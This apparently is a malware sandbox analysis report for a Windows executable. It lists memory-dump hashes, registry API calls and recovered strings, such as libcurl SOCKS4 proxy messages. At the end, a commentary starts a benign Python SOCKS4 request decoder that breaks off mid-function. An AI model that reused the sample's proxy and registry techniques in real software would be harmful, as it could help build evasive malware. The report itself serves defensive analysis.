                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ddd1db277e2011cbb527e7fada61f2ecc5250c5648cd93969958c3413c05dff2
                                                                                                                                                • Instruction ID: df4b06d03011a39ac16eb06e04a277bb66b04c703334a57af486b00b8e7859f0
                                                                                                                                                • Opcode Fuzzy Hash: ddd1db277e2011cbb527e7fada61f2ecc5250c5648cd93969958c3413c05dff2
                                                                                                                                                • Instruction Fuzzy Hash: 0002AE711187058FC756EE0CD49031AF3E1FFC8309F1A8A2DD68987B65E739A9198F86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                                                                                                                                                • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                                                                • Opcode Fuzzy Hash: 0143fbb01e4cb802368a0b9f9344aaf815a2c6f2a28245d16c8935a4c8e93d81
                                                                                                                                                • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                                                                                                                                                • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                                                                                                                • Opcode Fuzzy Hash: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                                                                                                                                                • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 68af38894e615a417dcc9ce400f649f4a33eca21d4aa763c3479721b6fbabfe1
                                                                                                                                                • Instruction ID: 853a6cf19b576dfe96f803938dcabd538528c4c4dd8e089c2ccfbfbd8b7b6b6e
                                                                                                                                                • Opcode Fuzzy Hash: 68af38894e615a417dcc9ce400f649f4a33eca21d4aa763c3479721b6fbabfe1
                                                                                                                                                • Instruction Fuzzy Hash: D27103796006068BD714CE2DC89076BB7E2FFD4314F58822EE9428B395E739ED15CB86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d4134f27dd97e73f3bdd7b499c4dcc1e4e4a61e26dd9816ff9f7023de7f7fc37
                                                                                                                                                • Instruction ID: 75534178eb80ec6e01f5b725a3f01c20fca299c0e1baefff308e87dfc00cab52
                                                                                                                                                • Opcode Fuzzy Hash: d4134f27dd97e73f3bdd7b499c4dcc1e4e4a61e26dd9816ff9f7023de7f7fc37
                                                                                                                                                • Instruction Fuzzy Hash: B241A725A5A2410EDB15803858943A61B0397F732AF68DBACF811897DBE13BC65FD345
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8c7853290da08b1c4ccdb9405d183808ad07ce792adb1b7bd51d2deab51b8cf1
                                                                                                                                                • Instruction ID: f4e65f016ee5d7650a961780782532b43604d62e7cd39c56d4980200ac8f2309
                                                                                                                                                • Opcode Fuzzy Hash: 8c7853290da08b1c4ccdb9405d183808ad07ce792adb1b7bd51d2deab51b8cf1
                                                                                                                                                • Instruction Fuzzy Hash: 19515276A05A018FD718CF2AC580546F7E3FFDD31072AC699C5599B32AD730F842DA94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7843b180895422b3b0bcc0ba4a262943549954c7f4171b96b157888fc70d2e22
                                                                                                                                                • Instruction ID: f0f5bba2842bb07d33bec44bd691a946f0f1e101ba1c31b0fc442c3623c76d97
                                                                                                                                                • Opcode Fuzzy Hash: 7843b180895422b3b0bcc0ba4a262943549954c7f4171b96b157888fc70d2e22
                                                                                                                                                • Instruction Fuzzy Hash: B1518BF390D3985BD3249FA5CC8129AF3E0BFD8250F4B872DED88E7601EB7596419681
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                • Instruction ID: 0aef348246a36b2d951103fe81851972c988d3d3e073ba7f9e62acd741cb6683
                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                • Instruction Fuzzy Hash: 96117D772011524FDF248A3DC8B46BBEF96EBC5320B2C437BDD428B758D22AD9529508
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strncpy
                                                                                                                                                • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                                                • API String ID: 2961919466-3442644082
                                                                                                                                                • Opcode ID: 370d97a26fd55fe5312427e04acd8e9d242e03e4aca6ce45750c7614cb2e2111
                                                                                                                                                • Instruction ID: ef936eaeead06bc4e06970c8d829bb005022ba1551b8e6dedf1dfb4c912dd13a
                                                                                                                                                • Opcode Fuzzy Hash: 370d97a26fd55fe5312427e04acd8e9d242e03e4aca6ce45750c7614cb2e2111
                                                                                                                                                • Instruction Fuzzy Hash: 4E41123021EE8E86C718421855985BE18D8A700B417ADE56FAF03CE290DA1F9D47E3BF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen$__fprintf_l_sscanf_strpbrk
                                                                                                                                                • String ID: %15[^:]://%[^/?]%[^]$%15[^:]:%[^]$%25$%[^/?]%[^]$://$<url> malformed$DICT.$FTP.$IMAP.$Illegal characters found in URL$Invalid IPv6 address format$LDAP.$POP3.$Please URL encode %% as %%25, see RFC 6874.$Rebuilt URL to: %s$SMTP.$file$PO
                                                                                                                                                • API String ID: 927942060-2579517905
                                                                                                                                                • Opcode ID: f619729756c6dcac7c04b87b72672ded9ceeb926a3222fbdcdf4aafdfea8507d
                                                                                                                                                • Instruction ID: e4dc228a71555aecc3257a371c6e3ed86abc4b99a4fa64eb09998f20697bc6c5
                                                                                                                                                • Opcode Fuzzy Hash: f619729756c6dcac7c04b87b72672ded9ceeb926a3222fbdcdf4aafdfea8507d
                                                                                                                                                • Instruction Fuzzy Hash: FCE1A271904609AFEF10ABB5DC42BEF7BA9EF05314F10041BFA04A6252EB7D99018B7D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,Delete), ref: 00402B79
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,ForceRemove), ref: 00402B88
                                                                                                                                                • lstrlenW.KERNEL32(>%@), ref: 00402C17
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,NoRemove), ref: 00402C69
                                                                                                                                                • lstrcmpiW.KERNEL32(>%@,Val), ref: 00402C94
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020006,?), ref: 00402D3B
                                                                                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00402D56
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D6E
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,>%@,00000000,0002001F,?), ref: 00402DB8
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402DCA
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,>%@,00000000,00020019,00000000), ref: 00402DFB
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402E08
                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,>%@,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00402E35
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402E4A
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,>%@,00000000,00020019,00000001), ref: 00402EAD
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402EC3
                                                                                                                                                • lstrlenW.KERNEL32(>%@), ref: 00402F34
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402FA7
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0040301F
                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0040304D
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040306B
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403094
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004030B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Close$Openlstrcmpi$Deletelstrlen$CreateValue
• String ID: >%@$Delete$ForceRemove$NoRemove$Val
• API String ID: 865444135-3142799315
• Opcode ID: 947f2cd8be5cd7703c7e5f0434b6d1b933b11ce1d6eceb589e5fd956eb16a2d7
• Instruction ID: d313f38c03f155d1a0c9b4e306f312808d35ecdb7d7cfabd05011026114f2235
• Opcode Fuzzy Hash: 947f2cd8be5cd7703c7e5f0434b6d1b933b11ce1d6eceb589e5fd956eb16a2d7
• Instruction Fuzzy Hash: F6E19D715083129BC721DF25C988A2FB6E8AB84795F10093FF845B72D1D7B8CD44DBAA
Uniqueness

Uniqueness Score: -1.00%

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE279
• __allrem.LIBCMT ref: 004BE2A0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE2AD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE2BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE2E1
• __allrem.LIBCMT ref: 004BE305
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE312
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE321
• __fprintf_l.LIBCMT ref: 004BE332
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE352
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE376
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004BE38C
• __fprintf_l.LIBCMT ref: 004BE39D
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem__fprintf_l
• String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
• API String ID: 1461520624-2102732564
• Opcode ID: e818df50e409ee096e6164f849e58c36f407fd942ec9aeaa9d2fd772b0ac3b33
• Instruction ID: fd4231aeeef7849f038faa87b259389f1066b07c686a06f05a4d6b103965d880
• Opcode Fuzzy Hash: e818df50e409ee096e6164f849e58c36f407fd942ec9aeaa9d2fd772b0ac3b33
• Instruction Fuzzy Hash: 9D318BE26442197DF920251F5D82FFF186CEBE3BA8F10505FBE06A248285AD2C41617E
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0041B2CB
• _memset.LIBCMT ref: 0041B31D
• GetVersionExW.KERNEL32(?), ref: 0041B338
• _memset.LIBCMT ref: 0041B37B
• CloseHandle.KERNEL32(?), ref: 0041B3AD
• LoadLibraryW.KERNEL32(userenv.dll), ref: 0041B3D8
• GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0041B3F1
• GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041B3FD
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc_memset$CloseH_prologHandleLibraryLoadVersion
• String ID: "%s" %s$0$CreateEnvironmentBlock$D$DestroyEnvironmentBlock$userenv.dll$|P
• API String ID: 3240376209-1693829574
• Opcode ID: ae0502583fdadc9b1cef92487fb476a0e2f06a704a7e58755340d9e88085bda3
• Instruction ID: 5c28ccc2b5366bde6329770190cb59f2daad24da2ac4220faca16b76955ae46f
• Opcode Fuzzy Hash: ae0502583fdadc9b1cef92487fb476a0e2f06a704a7e58755340d9e88085bda3
• Instruction Fuzzy Hash: F2513B71C0010DEFDF11AFA5CC859EEBBB9FF08349F10802AE615B2251D7395A858BA9
Uniqueness

Uniqueness Score: -1.00%

Strings
• Connection time-out, xrefs: 004BC835
• Failed to resolve "%s" for SOCKS4 connect., xrefs: 004BC954
• %hu.%hu.%hu.%hu, xrefs: 004BC8F7
• Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 004BCB59
• Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 004BCB03
• Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 004BCACE
• SOCKS4 communication to %s:%d, xrefs: 004BC85B
• Too long SOCKS proxy name, can't use!, xrefs: 004BC983
• SOCKS4%s request granted., xrefs: 004BCB77
• SOCKS4 reply has wrong version, version should be 4., xrefs: 004BCA85
• Failed to send SOCKS4 connect request., xrefs: 004BCB9A
• Failed to receive SOCKS4 connect request ack., xrefs: 004BCB93
• SOCKS4 connect to %s (locally resolved), xrefs: 004BC936
• Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 004BCB2E
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: __fprintf_l_strlen
• String ID: %hu.%hu.%hu.%hu$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Connection time-out$Failed to receive SOCKS4 connect request ack.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to %s (locally resolved)$SOCKS4 reply has wrong version, version should be 4.$SOCKS4%s request granted.$Too long SOCKS proxy name, can't use!
• API String ID: 2029578563-568593966
• Opcode ID: 19f6444e9f45393f5684012ab68fbe43289d4ad80421b1b286a1ee27e3cbbdd9
• Instruction ID: 48940c236c3581d4c5a8e2ffc906d46e80cb2f334ad4048a61ea3c5b1ae998cc
• Opcode Fuzzy Hash: 19f6444e9f45393f5684012ab68fbe43289d4ad80421b1b286a1ee27e3cbbdd9
• Instruction Fuzzy Hash: 9CB1E3B180819CAEDF319AA58CC1FFF7BB89F19305F24001BF940F6182D66D9A059B79
Uniqueness

Uniqueness Score: -1.00%
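
The string table above is libcurl's SOCKS4 client (lib/socks.c) wording, which tells an analyst that the sample carries a statically linked libcurl for its network traffic; the messages map one-to-one onto the SOCKS4 reply codes 90 (granted), 91 (rejected or failed), 92 (no identd on the client) and 93 (identd user-id mismatch). The following added example, which is not code from the report or from the sample, encodes a SOCKS4 CONNECT request and decodes the 8-byte reply into the same messages, so the strings can be matched against captured proxy traffic. The destination address, port, user-id and the reply bytes are constructed for illustration.

```python
import socket
import struct

SOCKS4_VERSION = 4       # VN byte in the client request
SOCKS4_CMD_CONNECT = 1   # CD byte: CONNECT
REPLY_GRANTED = 90

# Reply codes from the SOCKS4 protocol, paired with the message suffixes
# recovered from the sample (libcurl's wording).
REPLY_MESSAGES = {
    91: "request rejected or failed.",
    92: "request rejected because SOCKS server cannot connect to identd on the client.",
    93: "request rejected because the client program and identd report different user-ids.",
}


def build_connect_request(dst_ip: str, dst_port: int, userid: str = "") -> bytes:
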